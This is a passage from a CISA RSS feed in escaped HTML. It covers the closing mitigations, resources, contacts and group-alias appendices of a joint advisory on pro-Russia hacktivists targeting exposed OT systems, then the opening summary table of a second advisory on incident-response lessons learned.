&lt;li&gt;&lt;strong&gt;Asset owners should use attack surface management services&amp;nbsp;&lt;/strong&gt;and web-based search platforms to scan the internet. This mitigation can help identify if there are VNC systems exposed within the IP ranges they own, especially for connections set up by third parties.&lt;br&gt;&lt;strong&gt;Note:&lt;/strong&gt; For more information on attack surface management, see CISA’s &lt;a href=&quot;https://www.cisa.gov/resources-tools/resources/exposure-reduction&quot; title=&quot;Internet Exposure Reduction Guidance&quot;&gt;Internet Exposure Reduction Guidance&lt;/a&gt;, CISA’s &lt;a href=&quot;https://www.cisa.gov/cyber-hygiene-services&quot; title=&quot;Cyber Hygiene Services&quot;&gt;Cyber Hygiene Services&lt;/a&gt; for U.S. critical infrastructure, and NSA’s &lt;a href=&quot;https://www.nsa.gov/Portals/75/documents/resources/everyone/Attack%20Surface%20Management%20copy.pdf&quot; target=&quot;_blank&quot; title=&quot;Attack Surface Management&quot; data-entity-type=&quot;external&quot;&gt;Attack Surface Management&lt;/a&gt; for the U.S. Defense Industrial Base.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Implement network segmentation between IT and OT networks.&lt;/strong&gt; Segmenting critical systems and introducing a demilitarized zone (DMZ) for passing control data to enterprise logistics reduces the potential impact of cyber threats and the risk of disruptions to essential OT operations [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#ImplementLogicalPhysicalNetworkSegmentation3I&quot; title=&quot;CPG 3.I&quot;&gt;CPG 3.I&lt;/a&gt;].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Consider implementing a firewall and/or virtual private network&lt;/strong&gt; if exposure to the internet is necessary for controlling access to devices.
&lt;ul&gt;
&lt;li&gt;Consider disabling public exposure by default and implementing time-limited remote access to reduce the amount of time systems are exposed.&lt;/li&gt;
&lt;li&gt;Restrict and monitor both inbound and outbound traffic at OT perimeter firewalls. Configure OT perimeter firewalls to enforce a default-deny policy for all traffic. Asset owners should explicitly permit authorized destinations and protocols based on operational requirements.&lt;/li&gt;
&lt;li&gt;Implement strict egress filtering to prevent unauthorized data exfiltration or command-and-control callbacks.&lt;/li&gt;
&lt;li&gt;Regularly audit firewall rulesets and monitor outbound traffic patterns for anomalies indicative of threat actor activity, such as beaconing or unexpected protocol usage.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Adopt mature asset management processes&lt;/strong&gt;, including mapping data flows and access points. Generating a complete picture of both OT and IT assets provides visibility to operators and management, allowing organizations to monitor and assess deviations for criticality [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#ManageOrganizationalAssets2A&quot; title=&quot;CPG 2.A&quot;&gt;CPG 2.A&lt;/a&gt;].
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Keep remote access services updated&amp;nbsp;&lt;/strong&gt;with the latest version available and ensure all systems and software are up to date with patches and necessary security updates.
&lt;ul&gt;
&lt;li&gt;Keep VNC systems updated with the latest version available.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Refer to the joint&amp;nbsp;&lt;/strong&gt;&lt;a href=&quot;https://www.cisa.gov/resources-tools/resources/foundations-ot-cybersecurity-asset-inventory-guidance-owners-and-operators&quot; title=&quot;Foundations for OT Cybersecurity: Asset Inventory Guidance for Owners and Operators&quot;&gt;&lt;strong&gt;Foundations for OT Cybersecurity: Asset Inventory Guidance for Owners and Operators&lt;/strong&gt;&lt;/a&gt; to help with reducing cybersecurity risk by identifying which assets within their environment should be secured and protected.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Ensure OT assets use robust authentication procedures.&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Many devices lack robust authentication and authorization. Devices with weak authentication are vulnerable targets to threat actors using credential theft techniques.&lt;/li&gt;
&lt;li&gt;Implement MFA where possible. Where MFA is not feasible, use strong, unique passwords. Apply password standards for operator-accessible services on underlying OT assets, as well as network devices protecting those services. This is especially important for services that require internet accessibility [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#ChangingDefaultPasswords3A&quot; title=&quot;CPG 3.A&quot;&gt;CPG 3.A&lt;/a&gt;] [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#EstablishMinimumPasswordStrength3B&quot; title=&quot;CPG 3.B&quot;&gt;CPG 3.B&lt;/a&gt;] [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#CreateUniqueCredentials3C&quot; title=&quot;CPG 3.C&quot;&gt;CPG 3.C&lt;/a&gt;] [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#ImplementMultifactorAuthentication3F&quot; title=&quot;CPG 3.F&quot;&gt;CPG 3.F&lt;/a&gt;].&lt;/li&gt;
&lt;li&gt;Establish an allowlist that permits only authorized device IP addresses and/or media access control addresses. The allowlist can be refined to operator working hours to further obstruct malicious threat actor activity; organizations are encouraged to establish monitoring and alerting for access attempts not meeting these criteria [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#MonitorUnsuccessfulAutomatedLoginAttempts3E&quot; title=&quot;CPG 3.E&quot;&gt;CPG 3.E&lt;/a&gt;].&lt;/li&gt;
&lt;li&gt;Disable any unused authentication methods, logic, or features, such as default authentication keys and default passwords. Block all unused high ephemeral ports and monitor for attempted connections using standard protocols on non-standard ports [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#ProhibitConnectionofUnauthorizedDevices3R&quot; title=&quot;CPG 3.R&quot;&gt;CPG 3.R&lt;/a&gt;].&lt;/li&gt;
&lt;li&gt;Authenticate all access to field controllers before authorizing access to, or modification of, a device’s state, logic, program, or filesystems.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Enable control system security features&amp;nbsp;&lt;/strong&gt;that can separate and audit view and control functions. Limiting remotely accessible or default user accounts to “view-only” removes the potential for impact without exploiting a vulnerability [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#AdministratorsMaintainSeparateUserandPrivilegedAccounts3G&quot; title=&quot;CPG 3.G&quot;&gt;CPG 3.G&lt;/a&gt;].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Implement and practice business recovery/disaster recovery plans.&lt;/strong&gt; Plans should also take into consideration redundancy, fail-safe mechanisms, islanding capabilities, backup restoration, and manual operation.
&lt;ul&gt;
&lt;li&gt;Include scenarios that necessitate switching to manual operations. Maintaining the capability of an organization to revert to manual controls to quickly restore operations is vital in the immediate aftermath of a cyber incident [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#IncidentPlanningandPreparedness6A&quot; title=&quot;CPG 6.A&quot;&gt;CPG 6.A&lt;/a&gt;].&lt;/li&gt;
&lt;li&gt;Create backups of the engineering logic, configurations, and firmware of HMIs to enable fast recovery. Organizations should routinely test backups and standby systems to ensure safe manual operations in the event of an incident [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#MaintainSystemBackupsRestorationAbility3O&quot; title=&quot;CPG 3.O&quot;&gt;CPG 3.O&lt;/a&gt;].&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Collect and monitor the traffic of OT assets and networking devices.&lt;/strong&gt; This includes unusual logins or unexpected protocols communicating over the internet, and functions of ICS management protocols that change an asset’s operating mode or modify programs.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Review configurations for setpoint ranges or tag values&amp;nbsp;&lt;/strong&gt;to stay within safe ranges and establish alerting for deviations.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Take a proactive approach in the procurement process&lt;/strong&gt; by following the guidance outlined in the joint guide &lt;a href=&quot;https://www.cisa.gov/resources-tools/resources/secure-demand-priority-considerations-operational-technology-owners-and-operators-when-selecting&quot; title=&quot;Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products&quot;&gt;Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;OT Device Manufacturers&lt;/h3&gt;
&lt;p&gt;Although critical infrastructure organizations can take steps to mitigate risks, it is ultimately the responsibility of OT device manufacturers to build products that are secure by design. The authoring organizations urge device manufacturers to take ownership of the security outcomes of their customers in line with the joint guide &lt;a href=&quot;https://www.cisa.gov/resources-tools/resources/secure-by-design&quot; title=&quot;Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software&quot;&gt;Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software&lt;/a&gt;.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Eliminate default credentials and require strong passwords.&lt;/strong&gt; The use of default credentials is a top weakness threat actors exploit to gain access to systems.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Mandate MFA for privileged users.&lt;/strong&gt; Changes to engineering logic or configurations are safety-impacting events in critical infrastructure. MFA should be available for safety critical components at no additional cost.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Practice secure by default principles.&amp;nbsp;&lt;/strong&gt;OT components were initially designed without public internet connectivity in mind. When internet connection becomes necessary, implementing additional security measures is essential to safeguard these systems. Manufacturers should recognize insecure states and promptly inform users so they can make informed risk decisions.
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Include logging at no additional charge.&lt;/strong&gt; Change and access control logs allow operators to track safety-impacting events in their critical infrastructure. These logs should be available for no cost and use open standard logging formats.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Publish Software Bill of Materials (SBOMs).&lt;/strong&gt; Vulnerabilities in underlying software libraries can affect a wide range of devices. Without an SBOM, it is nearly impossible for a critical infrastructure system owner to measure and mitigate the impact of a vulnerability on their existing systems. See CISA’s &lt;a href=&quot;https://www.cisa.gov/sbom&quot; title=&quot;Software Bill of Materials&quot;&gt;SBOM webpage&lt;/a&gt; for more information.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Additionally, see CISA’s &lt;a href=&quot;https://www.cisa.gov/resources-tools/resources/secure-design-alert-how-software-manufacturers-can-shield-web-management-interfaces-malicious-cyber&quot; title=&quot;Secure by Design Alert&quot;&gt;Secure by Design Alert&lt;/a&gt; on how software manufacturers can shield web management interfaces from malicious cyber activity. By using secure by design tactics, software manufacturers can make their product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing tiered security software and logs, monitoring, and making routine updates.&lt;/p&gt;
&lt;p&gt;For more information on secure by design, see CISA’s &lt;a href=&quot;https://www.cisa.gov/securebydesign&quot; title=&quot;Secure by Design&quot;&gt;Secure by Design&lt;/a&gt; webpage.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Validate Security Controls&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;In addition to applying mitigations, the authoring organizations recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&amp;amp;CK Matrix for Enterprise framework in this advisory. The authoring organizations recommend testing your existing security controls inventory to assess how it performs against the ATT&amp;amp;CK techniques described in this advisory.&lt;/p&gt;
&lt;p&gt;To start:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Select an ATT&amp;amp;CK technique described in this advisory (see &lt;a href=&quot;#Table1&quot; title=&quot;Table 1&quot;&gt;&lt;strong&gt;Table 1&lt;/strong&gt;&lt;/a&gt; to&lt;strong&gt; &lt;/strong&gt;&lt;a href=&quot;#Table10&quot; title=&quot;Table 10&quot;&gt;&lt;strong&gt;Table 10&lt;/strong&gt;&lt;/a&gt;).&lt;/li&gt;
&lt;li&gt;Align your security technologies against the technique.&lt;/li&gt;
&lt;li&gt;Test your technologies against the technique.&lt;/li&gt;
&lt;li&gt;Analyze your detection and prevention technologies’ performance.&lt;/li&gt;
&lt;li&gt;Repeat the process for all security technologies to obtain a set of comprehensive performance data.&lt;/li&gt;
&lt;li&gt;Tune your security program, including people, processes, and technologies, based on the data generated by this process.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The authoring organizations recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;amp;CK techniques identified in this advisory.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Resources&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Entities requiring additional support for implementing any of the mitigations in this advisory should contact their regional CISA Cybersecurity Advisor for assistance. Key resources organizations should reference include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;CISA, EPA, NSA, FBI, ASD’s ACSC, Cyber Centre, BSI, NCSC-NL, and NCSC-NZ’s &lt;a href=&quot;https://www.cisa.gov/resources-tools/resources/foundations-ot-cybersecurity-asset-inventory-guidance-owners-and-operators&quot; title=&quot;Foundations for OT Cybersecurity: Asset Inventory Guidance for Owners and Operators&quot;&gt;Foundations for OT Cybersecurity: Asset Inventory Guidance for Owners and Operators&lt;/a&gt; offers best practices to assist organizations in identifying and prioritizing which assets should be secured and protected.&lt;/li&gt;
&lt;li&gt;CISA, FBI, NSA, EPA, DOE, USDA, FDA, MS-ISAC, Cyber Centre, and NCSC-UK’s guidance on &lt;a href=&quot;https://www.cisa.gov/resources-tools/resources/defending-ot-operations-against-ongoing-pro-russia-hacktivist-activity&quot; title=&quot;Defending OT Operations Against Ongoing Pro-Russia Hacktivist Activity&quot;&gt;Defending OT Operations Against Ongoing Pro-Russia Hacktivist Activity&lt;/a&gt; that can help organizations protect OT systems from pro-Russia hacktivist activity.&lt;/li&gt;
&lt;li&gt;NSA and CISA’s guidance on &lt;a href=&quot;https://media.defense.gov/2022/Sep/22/2003083007/-1/-1/0/CSA_ICS_Know_the_Opponent_.PDF&quot; target=&quot;_blank&quot; title=&quot;Control System Defense: Know the Opponent&quot; data-entity-type=&quot;external&quot;&gt;Control System Defense: Know the Opponent&lt;/a&gt; helps organizations defend OT and ICS assets against malicious cyber activity.&lt;/li&gt;
&lt;li&gt;CISA and EPA’s resource page on &lt;a href=&quot;https://www.cisa.gov/water&quot; title=&quot;Water and Wastewater Cybersecurity&quot;&gt;Water and Wastewater Cybersecurity&lt;/a&gt; to help organizations reduce risks posed by malicious cyber actors targeting water and wastewater systems.
&lt;ul&gt;
&lt;li&gt;For additional guidance, see CISA, EPA, and FBI’s fact sheet on &lt;a href=&quot;https://www.cisa.gov/resources-tools/resources/top-cyber-actions-securing-water-systems&quot; title=&quot;Top Cyber Actions for Securing Water Systems&quot;&gt;Top Cyber Actions for Securing Water Systems&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;The Food and Ag-ISAC’s best practices on &lt;a href=&quot;https://www.idfa.org/wordpress/wp-content/uploads/2023/07/Food-and-Ag-ISAC-Cybersecurity-Guide-2023_IDFA.pdf&quot; target=&quot;_blank&quot; title=&quot;Food and Ag Cybersecurity: A Guide for Small &amp;amp; Medium Enterprises&quot; data-entity-type=&quot;external&quot;&gt;Food and Ag Cybersecurity: A Guide for Small &amp;amp; Medium Enterprises&lt;/a&gt; provides recommendations to help mitigate against cyber threats.&lt;/li&gt;
&lt;li&gt;DOE and National Association of Regulatory Utility Commissioners &lt;a href=&quot;https://www.naruc.org/core-sectors/critical-infrastructure-and-cybersecurity/cybersecurity-for-utility-regulators/cybersecurity-baselines/&quot; target=&quot;_blank&quot; title=&quot;Cybersecurity Baselines for Electric Distribution Systems and Distributed Energy (DER)&quot; data-entity-type=&quot;external&quot;&gt;Cybersecurity Baselines for Electric Distribution Systems and Distributed Energy (DER)&lt;/a&gt; webpage provides resources for state public utility commissions and utilities, as well as DER operators and aggregators to help mitigate cybersecurity risks.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Additional resources that apply to this advisory include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;EPA’s &lt;a href=&quot;https://www.epa.gov/cyberwater/epa-cybersecurity-water-sector&quot; target=&quot;_blank&quot; title=&quot;Cybersecurity for the Water Sector&quot; data-entity-type=&quot;external&quot;&gt;Cybersecurity for the Water Sector&lt;/a&gt; resource page provides organizations with guidance on implementing basic cyber hygiene practices.&lt;/li&gt;
&lt;li&gt;CISA’s &lt;a href=&quot;https://www.cisa.gov/cross-sector-cybersecurity-performance-goals&quot; title=&quot;Cross-Sector Cybersecurity Performance Goals&quot;&gt;Cross-Sector Cybersecurity Performance Goals&lt;/a&gt; enables critical infrastructure organizations to reduce the likelihood and impact of known risks and adversary techniques.&lt;/li&gt;
&lt;li&gt;CISA’s &lt;a href=&quot;https://www.cisa.gov/audiences/small-and-medium-businesses/secure-your-business/require-strong-passwords&quot; title=&quot;Require Strong Passwords&quot;&gt;Require Strong Passwords&lt;/a&gt; webpage supports small and medium-sized businesses mitigating against malicious cyber activity that targets weak passwords.&lt;/li&gt;
&lt;li&gt;CISA, NSA, FBI, EPA, TSA, and international partners’ guidance &lt;a href=&quot;https://www.cisa.gov/resources-tools/resources/secure-demand-priority-considerations-operational-technology-owners-and-operators-when-selecting&quot; title=&quot;Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products&quot;&gt;Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;DOE’s guidance on &lt;a href=&quot;https://www.energy.gov/ceser/cyber-informed-engineering&quot; target=&quot;_blank&quot; title=&quot;Cyber-Informed Engineering&quot; data-entity-type=&quot;external&quot;&gt;Cyber-Informed Engineering&lt;/a&gt; recommends considering cyber-enabled risks during the conception, design, and development phases when manufacturing physical systems.&lt;/li&gt;
&lt;li&gt;CISA’s &lt;a href=&quot;https://www.cisa.gov/cyber-hygiene-services&quot; title=&quot;Cyber Hygiene Services&quot;&gt;Cyber Hygiene Services&lt;/a&gt; help enable critical infrastructure organizations to reduce their exposure to threats by taking a proactive approach to monitoring and mitigating attack vectors.&lt;/li&gt;
&lt;li&gt;CISA, NSA, FBI, and international partners’ guidance on &lt;a href=&quot;https://www.cisa.gov/resources-tools/resources/secure-by-design&quot; title=&quot;Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software&quot;&gt;Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software&lt;/a&gt; urges software manufacturers to provide customers with products that are safer and more secure.
&lt;ul&gt;
&lt;li&gt;See more information in these Secure by Design Alerts: &lt;a href=&quot;https://www.cisa.gov/resources-tools/resources/secure-design-alert-how-manufacturers-can-protect-customers-eliminating-default-passwords&quot; title=&quot;How Manufacturers Can Protect Customers by Eliminating Default Passwords&quot;&gt;How Manufacturers Can Protect Customers by Eliminating Default Passwords&lt;/a&gt; and &lt;a href=&quot;https://www.cisa.gov/resources-tools/resources/secure-design-alert-how-software-manufacturers-can-shield-web-management-interfaces-malicious-cyber&quot; title=&quot;How Software Manufacturers Can Shield Web Management Interfaces From Malicious Cyber Activity&quot;&gt;How Software Manufacturers Can Shield Web Management Interfaces From Malicious Cyber Activity&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Contact&quot;&gt;&lt;strong&gt;Contact Information&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;U.S. organizations&lt;/strong&gt; are encouraged to report suspicious or criminal activity related to information in this advisory to CISA, FBI, and/or NSA:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Contact CISA via CISA’s 24/7 Operations Center at &lt;a href=&quot;mailto:contact@cisa.dhs.gov&quot; title=&quot;contact@cisa.dhs.gov&quot;&gt;contact@cisa.dhs.gov&lt;/a&gt; or 1-844-Say-CISA (1-844-729-2472) or your local &lt;a href=&quot;https://www.fbi.gov/contact-us/field-offices&quot; target=&quot;_blank&quot; title=&quot;FBI field office&quot; data-entity-type=&quot;external&quot;&gt;FBI field office&lt;/a&gt;. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.&lt;/li&gt;
&lt;li&gt;For NSA cybersecurity guidance inquiries, contact &lt;a href=&quot;mailto:CybersecurityReports@nsa.gov&quot; target=&quot;_blank&quot; title=&quot;CybersecurityReports@nsa.gov&quot;&gt;CybersecurityReports@nsa.gov&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Australian organizations:&lt;/strong&gt; Visit &lt;a href=&quot;https://www.cyber.gov.au/&quot; target=&quot;_blank&quot; title=&quot;cyber.gov.au&quot; data-entity-type=&quot;external&quot;&gt;cyber.gov.au&lt;/a&gt; or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Canadian organizations:&lt;/strong&gt; Report incidents by emailing Cyber Centre at &lt;a href=&quot;mailto:contact@cyber.gc.ca&quot; target=&quot;_blank&quot; title=&quot;contact@cyber.gc.ca&quot;&gt;contact@cyber.gc.ca&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;New Zealand organizations:&lt;/strong&gt; Report cyber security incidents to &lt;a href=&quot;mailto:incidents@ncsc.govt.nz&quot; target=&quot;_blank&quot; title=&quot;incidents@ncsc.govt.nz&quot;&gt;incidents@ncsc.govt.nz&lt;/a&gt; or call 04 498 7654.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;United Kingdom organizations:&lt;/strong&gt; Report a significant cyber security incident: &lt;a href=&quot;https://report.ncsc.gov.uk/&quot; target=&quot;_blank&quot; title=&quot;report.ncsc.gov.uk&quot; data-entity-type=&quot;external&quot;&gt;report.ncsc.gov.uk&lt;/a&gt; (monitored 24 hours) or, for urgent assistance, call 03000 200 973.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Disclaimer&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;The information in this report is being provided “as is” for informational purposes only. The authoring organizations do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products,&amp;nbsp;processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI and co-sealers.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Acknowledgements&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Schneider Electric, Nozomi Networks, Eversource Energy, Electricity Information Sharing and Analysis Center, Chevron, BP, and Dragos contributed to this advisory.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Version History&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;December 09, 2025:&lt;/strong&gt; Initial version.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Appendix A: Targeting Methodologies for Pro-Russia Hacktivist Groups&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;For further information on targeting methodologies for pro-Russia hacktivist groups, see:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;CISA’s alert &lt;a href=&quot;https://www.cisa.gov/news-events/alerts/2025/05/06/unsophisticated-cyber-actors-targeting-operational-technology&quot; title=&quot;Unsophisticated Cyber Threat Actor(s) Targeting Operational Technology&quot;&gt;Unsophisticated Cyber Threat Actor(s) Targeting Operational Technology&lt;/a&gt;;&lt;/li&gt;
&lt;li&gt;The joint fact sheet &lt;a href=&quot;https://www.cisa.gov/resources-tools/resources/primary-mitigations-reduce-cyber-threats-operational-technology&quot; title=&quot;Primary Mitigations to Reduce Cyber Threats to Operational Technology&quot;&gt;Primary Mitigations to Reduce Cyber Threats to Operational Technology&lt;/a&gt;; and&lt;/li&gt;
&lt;li&gt;CISA’s &lt;a href=&quot;https://www.cisa.gov/topics/cyber-threats-and-advisories/advanced-persistent-threats/russia&quot; title=&quot;Russia Cyber Threat&quot;&gt;Russia Cyber Threat&lt;/a&gt; webpage.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;AppB&quot;&gt;&lt;strong&gt;Appendix B: Additional Designators Used for Cited Groups&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;The cybersecurity industry and cyber actor groups often use various names to reference actor groups. While not exhaustive, the following are the most notable names used within the cybersecurity community to reference the groups in this advisory.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Cybersecurity organizations have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the authoring organizations’ understanding for all activity related to these groupings.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;GRU military unit 74455
&lt;ul&gt;
&lt;li&gt;Sandworm Team&lt;/li&gt;
&lt;li&gt;Voodoo Bear&lt;/li&gt;
&lt;li&gt;Seashell Blizzard&lt;/li&gt;
&lt;li&gt;APT44&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Cyber Army of Russia Reborn (CARR)
&lt;ul&gt;
&lt;li&gt;CyberArmy of Russia&lt;/li&gt;
&lt;li&gt;Народная&amp;nbsp;CyberАрмия&amp;nbsp;(НКА)&lt;/li&gt;
&lt;li&gt;People’s CyberArmy of Russia (PCA)&lt;/li&gt;
&lt;li&gt;Russian CyberArmy Team (RCAT)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;NoName057(16)
&lt;ul&gt;
&lt;li&gt;NoName057(16) Spain&lt;/li&gt;
&lt;li&gt;NoName057(16) Italy&lt;/li&gt;
&lt;li&gt;NoName057(16) France&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Z-Pentest
&lt;ul&gt;
&lt;li&gt;Z-Pentest Beograd&lt;/li&gt;
&lt;li&gt;Z-Pentest Alliance&lt;/li&gt;
&lt;li&gt;Z-Alliance&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
</description>
  <pubDate>Fri, 05 Dec 2025 14:35:38 EST</pubDate>
    <dc:creator>CISA</dc:creator>
    <guid isPermaLink="false">/node/24278</guid>
    </item>
<item>
  <title>CISA Shares Lessons Learned from an Incident Response Engagement</title>
  <link>https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-266a</link>
  <description>&lt;h2&gt;&lt;strong&gt;Advisory at a Glance&lt;/strong&gt;&lt;/h2&gt;
&lt;table&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Executive Summary&lt;/td&gt;
&lt;td&gt;CISA began incident response efforts at a U.S. federal civilian executive branch (FCEB) agency following the detection of potential malicious activity identified through security alerts generated by the agency’s endpoint detection and response (EDR) tool. CISA identified three lessons learned from the engagement that illuminate how to effectively mitigate risk, prepare for, and respond to incidents: vulnerabilities were not promptly remediated, the agency did not test or exercise their incident response plan (IRP), and EDR alerts were not continuously reviewed.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Key Actions&lt;/td&gt;
&lt;td&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Prevent compromise&lt;/strong&gt; by prioritizing the patching of critical vulnerabilities in public-facing systems and known exploited vulnerabilities.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Prepare for incidents&lt;/strong&gt; by maintaining, practicing, and updating incident response plans.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Prepare for incidents&lt;/strong&gt; by implementing comprehensive and verbose logging and aggregate logs in a centralized out-of-band location.&lt;/li&gt;
&lt;/ul&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Indicators of Compromise&amp;nbsp;&lt;/td&gt;
&lt;td&gt;
&lt;p&gt;For a downloadable copy of indicators of compromise, see:&amp;nbsp;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cisa.gov/sites/default/files/2025-09/AA25-266A-JSON.stix_.json&quot; title=&quot;JSON AA25-266A&quot;&gt;AA25-266A-JSON.stix_.json&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cisa.gov/sites/default/files/2025-09/AA25-266A-STIX.stix_.xml&quot; title=&quot;STIX AA25-266A&quot;&gt;AA25-266A-STIX.stix_.xml&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Intended Audience&lt;/td&gt;
&lt;td&gt;
&lt;p&gt;&lt;strong&gt;Organizations:&lt;/strong&gt; FCEB agencies and critical infrastructure organizations.&lt;/p&gt;
